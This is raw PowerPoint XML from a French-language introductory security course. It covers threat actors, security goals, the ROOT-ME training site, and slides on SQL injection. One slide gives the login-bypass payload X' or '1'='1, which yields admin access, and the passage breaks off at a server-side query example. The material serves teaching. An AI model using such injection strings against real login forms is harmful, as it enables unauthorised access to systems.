                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>illimités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA88547-A2C4-4711-A197-8A53C05224B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154662" y="5283692"/>
            <a:ext cx="4224557" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intérêts financiers, et des moyens conséquents.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D97F495-561C-40F7-A61E-98E5E79A8AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175890" y="1909425"/>
            <a:ext cx="3586032" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salarié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> / stagiaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B223C031-1A9D-4E73-B6D3-B445CFA2E7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8447762" y="1909425"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le concurrent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947BF3D4-D694-43BE-8AC2-29215C81B125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114936" y="6249036"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le crime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>organisé</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="31506C"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55FEF4D-A650-43E6-A0D1-30F2AF3EE318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8497926" y="6270245"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>états</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="31506C"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56784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4" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="2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1160E7-39CE-451C-82F8-324CDF7E3A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Initiation à ROOT-ME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAD9B97-AC52-4E03-ABDE-7B358B6BBE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="ui-monospace"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:latin typeface="ui-monospace"/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.root-me.org/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="ui-monospace"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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section « challenge / web – client »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3390E0F2-6637-42A2-A82C-339BCB11B7ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3720086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IT Professionals | Security MattersSecurity Matters">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70972882-F277-42FF-B21D-3760590CE6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9" r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6272453" y="1506070"/>
            <a:ext cx="5318913" cy="4839257"/>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2ABC5DE9-2D38-423D-9B9D-2F8DE9C26416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="897753"/>
            <a:ext cx="7114727" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La mise en œuvre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 1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7A55DCCE-B79F-4222-B1EB-F55CCEA2C558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695325" y="2710035"/>
            <a:ext cx="3587668" cy="3500265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>confidentialité</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>L’intégrité</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disponibilité</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>traçabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>données</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6925D13-C3D0-490E-8C18-020A610EDA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254496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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple d’une injection SQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="2293126"/>
            <a:ext cx="11385398" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate saisit une requête SQL dans le champ Login et dans le champ mot de passe. Par exemple : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X’ or ‘1’=‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate lance la requête via le bouton de connexion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La requête s’exécute, le pirate est authentifié en tant qu’admin et a accès sans restriction au site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423010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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple d’une injection SQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Serveur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate saisit une requête SQL dans le champ Login et ne saisit aucun mot de passe. Par exemple : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
